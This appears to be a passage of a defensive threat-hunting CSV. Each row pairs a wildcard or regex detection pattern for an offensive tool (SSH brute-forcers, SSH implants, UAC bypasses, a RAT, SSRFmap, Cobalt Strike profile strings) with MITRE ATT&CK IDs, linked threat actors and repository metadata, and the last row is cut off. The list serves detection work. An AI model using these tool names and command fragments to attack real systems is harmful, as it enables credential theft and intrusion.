"*sshBruteForce.exe*",".{0,1000}sshBruteForce\.exe.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","1","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","60155"
"*SSHBruteForce.py*",".{0,1000}SSHBruteForce\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","60156"
"*SSH-Hijack (reptyr)*",".{0,1000}SSH\-Hijack\s\(reptyr\).{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","60157"
"*sshimpanzee --*",".{0,1000}sshimpanzee\s\-\-.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","60158"
"*sshimpanzee:127.0.0.1:*",".{0,1000}sshimpanzee\:127\.0\.0\.1\:.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","60159"
"*sshimpanzee-1.1-exp*",".{0,1000}sshimpanzee\-1\.1\-exp.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","60160"
"*sshimpanzee-main*",".{0,1000}sshimpanzee\-main.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","60161"
"*sshkey_persistence.*",".{0,1000}sshkey_persistence\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60163"
"*ssh-keygen not found in PATH, cannot escalate using SSH key*",".{0,1000}ssh\-keygen\snot\sfound\sin\sPATH,\scannot\sescalate\susing\sSSH\skey.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","60164"
"*sshLooterC*",".{0,1000}sshLooterC.{0,1000}","offensive_tool_keyword","sshLooterC","script to steel password from ssh - Its the C version of sshLooter. which was written in python and have a lot of dependencies to be installed on the infected machine. Now with this C version. you compile it on your machine and send it to the infected machine without installing any dependencies.","T1003 - T1059 - T1083 - T1566 - T1558.003","TA0002 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mthbernardes/sshLooterC","1","1","N/A","N/A","N/A","3","266","86","2023-06-08T21:12:10Z","2018-12-19T20:25:11Z","60165"
"*ssh-mitm*",".{0,1000}ssh\-mitm.{0,1000}","offensive_tool_keyword","ssh-mitm","An SSH/SFTP man-in-the-middle tool that logs interactive sessions and passwords.","T1040 - T1071 - T1552","TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/jtesta/ssh-mitm","1","1","N/A","N/A","N/A","10","1657","203","2021-07-02T02:17:26Z","2017-05-16T19:55:10Z","60166"
"*sshmon*hunt*",".{0,1000}sshmon.{0,1000}hunt.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","60167"
"*sshmon*kill*",".{0,1000}sshmon.{0,1000}kill.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","60168"
"*ssh-putty-brute -*",".{0,1000}ssh\-putty\-brute\s\-.{0,1000}","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","0","N/A","N/A","9","3","285","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z","60169"
"*ssh-putty-brute.ps1*",".{0,1000}ssh\-putty\-brute\.ps1.{0,1000}","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","N/A","9","3","285","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z","60170"
"*SSH-PuTTY-login-bruteforcer*",".{0,1000}SSH\-PuTTY\-login\-bruteforcer.{0,1000}","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","N/A","9","3","285","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z","60171"
"*ssh-shellhost.exe*",".{0,1000}ssh\-shellhost\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","60172"
"*SSHSnake.log*",".{0,1000}SSHSnake\.log.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","60173"
"*SSH-Snake-main*",".{0,1000}SSH\-Snake\-main.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","60174"
"*sshuttle -r *0.0.0.0/24*",".{0,1000}sshuttle\s\-r\s.{0,1000}0\.0\.0\.0\/24.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60178"
"*SspiUacBypass*",".{0,1000}SspiUacBypass.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","60190"
"*SspiUacBypass.cpp*",".{0,1000}SspiUacBypass\.cpp.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","60191"
"*SspiUacBypass.exe*",".{0,1000}SspiUacBypass\.exe.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","60192"
"*SspiUacBypassBOF*",".{0,1000}SspiUacBypassBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","60193"
"*SspiUacBypass-main*",".{0,1000}SspiUacBypass\-main.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","60194"
"*SSploitEnumeration*",".{0,1000}SSploitEnumeration.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","60195"
"*SSploitEnumerationDomain*",".{0,1000}SSploitEnumerationDomain.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","60196"
"*SSploitExecution_DynamicInvoke*",".{0,1000}SSploitExecution_DynamicInvoke.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","60197"
"*SSploitExecution_Injection*",".{0,1000}SSploitExecution_Injection.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","60198"
"*SSploitLateralMovement*",".{0,1000}SSploitLateralMovement.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","60199"
"*SSploitPersistence*",".{0,1000}SSploitPersistence.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","60200"
"*SSploitPrivilegeEscalation*",".{0,1000}SSploitPrivilegeEscalation.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","60201"
"*sspr2john.py*",".{0,1000}sspr2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60202"
"*--ssrf --gopher --encode --scan-action filter-bypass*",".{0,1000}\-\-ssrf\s\-\-gopher\s\-\-encode\s\-\-scan\-action\sfilter\-bypass.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","60203"
"*ssrfmap -r *.txt -p id -m readfiles*portscan*",".{0,1000}ssrfmap\s\-r\s.{0,1000}\.txt\s\-p\sid\s\-m\sreadfiles.{0,1000}portscan.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60204"
"*SSRFmap*",".{0,1000}SSRFmap.{0,1000}","offensive_tool_keyword","SSRFmap","SSRF are often used to leverage actions on other services. this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.","T1210.001 - T1190 - T1191 - T1505 - T1213","TA0007 - TA0002 - TA0008 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","N/A","10","3167","538","2025-02-26T19:39:06Z","2018-10-15T19:08:26Z","60205"
"*ssrfmap.py*",".{0,1000}ssrfmap\.py.{0,1000}","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","N/A","10","3167","538","2025-02-26T19:39:06Z","2018-10-15T19:08:26Z","60206"
"*SSSDKCMExtractor.py*",".{0,1000}SSSDKCMExtractor\.py.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","146","15","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z","60207"
"*StackCrypt-main*",".{0,1000}StackCrypt\-main.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","60208"
"*StackEncrypt.cpp*",".{0,1000}StackEncrypt\.cpp.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","60209"
"*StackEncrypt.exe*",".{0,1000}StackEncrypt\.exe.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","60210"
"*StackEncrypt.sln*",".{0,1000}StackEncrypt\.sln.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","60211"
"*StackEncrypt.vcxproj*",".{0,1000}StackEncrypt\.vcxproj.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","60212"
"*stage.obfuscate*",".{0,1000}stage\.obfuscate.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","60213"
"*stage_smartinject*",".{0,1000}stage_smartinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","60214"
"*stage_transform_x64_prepend*",".{0,1000}stage_transform_x64_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","60215"
"*stage_transform_x64_strrep1*",".{0,1000}stage_transform_x64_strrep1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","60216"
"*stage_transform_x86_prepend*",".{0,1000}stage_transform_x86_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - 